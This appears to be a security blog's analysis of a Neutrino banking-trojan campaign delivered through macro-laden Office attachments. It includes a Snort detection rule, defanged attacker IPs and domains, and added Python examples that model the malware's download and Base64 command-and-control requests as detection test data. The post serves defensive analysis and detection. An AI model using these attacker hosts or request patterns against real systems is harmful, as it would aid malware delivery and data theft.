
Emerging Threats

Malware campaign — Neutrino infections

· frtg · 4 min read

Below is an analysis of the Neutrino Trojan. Among recent malware campaigns employing Neutrino, in which an Office attachment serves as the initial infection stage, a technique has recently been introduced to increase the credibility of the message and to bypass automated malware analysis systems.

Delivery Method

Neither the infection technique nor the type of campaign is new in the context of malware infections; both have been well documented for some time.

Infection occurs via email with a password-protected malicious attachment. The password is given in the email body, which leads the user to treat the attachment as trustworthy.

Upon entering the password, the document appears as follows:

Should the user enable the macro, it proceeds to download and execute additional malware components on the now-compromised system.

Network Analysis

From a network security perspective, infection within a controlled virtual environment generated a significant volume of IDS (Intrusion Detection System) alerts, with signatures that identify the threat type precisely:

Alerts were also generated for the download of an executable file (.exe) and for the fact that it was fetched directly from an IP address (dotted quad) rather than from a hostname.

More specific is the alert “ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016,” which identifies a malicious behaviour frequently seen in these campaigns: downloading the malware via macro.

IDS signature details:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016"; flow:established,to_server; content:"GET"; http_method; content:".exe"; http_uri; nocase; fast_pattern:only; content:"Accept|3a 20|*/*|0d 0a|"; depth:13; http_header; content:"Accept-Encoding|3a 20|gzip, deflate|0d 0a|"; http_header; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; pcre:"/(?:\/(?:(?:p(?:lugins\/content\/vote\/\.ssl\/[a-z0-9]|a(?:nel\/includes\/[^\x2f]+|tric)|o(?:sts?\/[a-z0-9]+|ny[a-z]*)|rogcicicic|m\d{1,2})|s(?:ystem\/(?:logs|engine)\/[^\x2f]+?|e(?:rv(?:au|er)|ct)|vchost[^\x2f]*|gau\/.*?|alam|ucks|can|ke)|(?=[a-z]*[0-9])(?=[0-9]*[a-z])(?!setup\d+\.exe$)[a-z0-9]{5,10}|in(?:voice(?:\/[^\x2f]+|[^\x2f]*)|st\d+|fos?)|a(?:d(?:min\/images\/\w+|obe)|salam|live|us)|m(?:edia\/files\/\w+|a(?:cros?|rch)|soffice)|d(?:o(?:c(?:\/[a-z0-9]+)?|ne)|bust)|(?:~.+?\/\.[^\x2f]+|\.css)\/.+?|c(?:onfig|hris|alc)|u(?:swinz\w+|pdate)|xml\/load\/[^\x2f]+|(?:[Dd]ocumen|ve)t|Ozonecrytedserver|w(?:or[dk]|insys)|t(?:mp\/.+?|est)|fa(?:cture|soo)|n(?:otepad|ach)|k(?:be|ey|is)|ArfBtxz|office|yhaooo|[a-z]|etna|link|\d+)\.exe$|(?:(?=[a-z0-9]*?[3456789][a-z0-9]*?[3456789])(?=[a-z0-9]*?[h-z])[a-z0-9]{3,31}\+|PasswordRecovery|RemoveWAT|Dejdisc|Host\d+|Msword)\.exe)|(?:^\/(?:image\/.+?\/[^\x2f]+|x\/setup)|[\x2f\s]order|keem)\.exe$)/Ui"; content:!".bloomberg.com|0d 0a|"; http_header; nocase; content:!".bitdefender.com|0d 0a|"; http_header; classtype:trojan-activity; sid:2022550; rev:15; metadata:affected_product MS_Office, attack_target Client_Endpoint, deployment Perimeter, tag MalDoc?, signature_severity Major, created_at 2016_02_18, malware_family MalDocGeneric?, performance_impact Low, updated_at 2016_07_01;)

These are the details an analyst considers in the initial phases of the analysis; they give important information about the infection process and about what is happening on the network.
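To make explicit what the signature above actually fingerprints, here is an added example (not code from the original post or from Emerging Threats) that re-implements the header conditions of sid:2022550 in Python and runs them over two constructed requests. The pcre is reduced to a handful of its alternatives, and the sample headers are assumptions.

```python
import re

# Added re-implementation of the checks in ET sid:2022550 (quoted above). The rule's
# pcre lists dozens of URI shapes; PCRE_SUBSET keeps only a few of them, including
# the "\d+\.exe$" alternative that matches this campaign's "1.exe".
UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT"
PCRE_SUBSET = re.compile(r"/(?:\d+|[a-z]|office|notepad|update|w(?:or[dk]|insys))\.exe$", re.I)
EXCLUDED = (".bloomberg.com", ".bitdefender.com")  # the rule's content:! exclusions

def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, uri, ordered [(name, value)])."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, uri, headers

def matches_sid_2022550(raw: str) -> bool:
    method, uri, headers = parse_request(raw)
    h = dict(headers)
    if method != "GET" or ".exe" not in uri.lower():
        return False
    # depth:13 on "Accept: */*\r\n" (13 bytes) means it must be the first header.
    if not headers or headers[0] != ("accept", "*/*"):
        return False
    if h.get("accept-encoding") != "gzip, deflate":
        return False
    if not h.get("user-agent", "").startswith(UA_PREFIX):
        return False
    if "referer" in h or "cookie" in h:  # negated contents: browsers usually send these
        return False
    if any(h.get("host", "").lower().endswith(d) for d in EXCLUDED):
        return False
    return PCRE_SUBSET.search(uri) is not None

# Constructed sample traffic (not a capture from the campaign): the macro fetching
# 1.exe from the delivery server, and an ordinary browser download for contrast.
DOWNLOADER_REQ = (
    "GET /1.exe HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0)\r\n"
    "Host: 209.141.59.124\r\n\r\n"
)
BROWSER_REQ = (
    "GET /downloads/setup.exe HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: https://example.com/downloads/\r\n\r\n"
)
```

The browser request fails on header order and on the Referer alone; the downloader passes every check, which is why this rule fires reliably on the macro stage even when the file name is as bland as 1.exe.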

Digging deeper, it is possible to characterise the threat type and to extract IOCs (Indicators of Compromise) for wider searches across systems and infrastructure. Through its Cyber Threat Intelligence capabilities, the EthicalSec association shares these indicators within its MISP community.

During analysis, 2 distinct servers belonging to the attacker’s infrastructure were identified:

  • 209[.]141[.]59[.]124
    • Malware Delivery Server (from which the executable file “1.exe” is downloaded)
    • Server: USA
  • securityupdateserver4[.]com / 47[.]254[.]203[.]38
    • C&C Server (for control and management of infected systems)
    • Domain Name: WhoisGuard Protected Panama
    • Server: Malaysia

Command & Control

By isolating communications with the command and control server, it is possible to identify the threat type:

The first 2 requests (GETs) download additional malware components.

The 8 POST requests to the “tasks.php” page are the exchange of instructions between the server and the infected workstation.

The content of the communication is particularly relevant for identifying the malware type. Here the request made by the “victim” and the server’s “404 Not Found” response can be observed.

The request contains the string “ZW50ZXI=”, which is “enter” in Base64.

The response, an apparent 404 error, actually carries the instructions: “Yir/iIr0Rw==”. The malware has thus established communication with the attacker’s server.

This information allows us to link the infection to the Neutrino malware, an InfoStealer aimed at harvesting banking data (including from POS terminals). Kaspersky Analysis
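To show how the tasks.php exchange described above can be triaged mechanically, here is an added example (not code from the original post): it scans a constructed request/response pair for Base64 tokens, decodes them, and flags a 404 that still carries a decodable payload. The form field name cmd= and the headers are assumptions; only the two Base64 strings come from the analysis above.

```python
import base64
import re
import string

# Runs of the Base64 alphabet plus optional "=" padding, not glued to other
# alphabet characters (so a field name such as "cmd=" before a token is fine).
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{6,}={0,2}(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable.encode())

def decode_tokens(body: str):
    """Return (token, decoded bytes, looks_like_text) for each strictly valid token."""
    out = []
    for tok in B64_TOKEN.findall(body):
        if len(tok) % 4:
            continue
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out.append((tok, raw, all(b in PRINTABLE for b in raw)))
    return out

def split_http(msg: str):
    head, _, body = msg.partition("\r\n\r\n")  # -> (start line, body)
    return head.split("\r\n")[0], body

def analyze_exchange(request: str, response: str) -> dict:
    _, req_body = split_http(request)
    status_line, resp_body = split_http(response)
    status = int(status_line.split(" ")[1])
    resp_tokens = decode_tokens(resp_body)
    # A 404 whose body is still a decodable Base64 blob is the beaconing pattern
    # described in the post: the "error" page is really the tasking channel.
    return {
        "status": status,
        "request": decode_tokens(req_body),
        "response": resp_tokens,
        "suspicious": status == 404 and bool(resp_tokens),
    }

# Constructed exchange: the field name "cmd" and the headers are assumptions; only
# the two Base64 strings are the ones quoted in the analysis above.
REQUEST = (
    "POST /tasks.php HTTP/1.1\r\n"
    "Host: securityupdateserver4.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "cmd=ZW50ZXI="
)
RESPONSE = "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\nYir/iIr0Rw=="
```

The request token decodes to readable text (“enter”), while the response token decodes to seven non-printable bytes, which is what you would expect of an encrypted or packed tasking blob rather than a genuine error page.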

Macro-based delivery combined with an obfuscated command protocol remains an effective way of establishing persistent access, particularly when paired with legitimate-looking network infrastructure and a Base64-encoded command channel hidden in apparently benign responses, which signature-based detection does not readily flag.
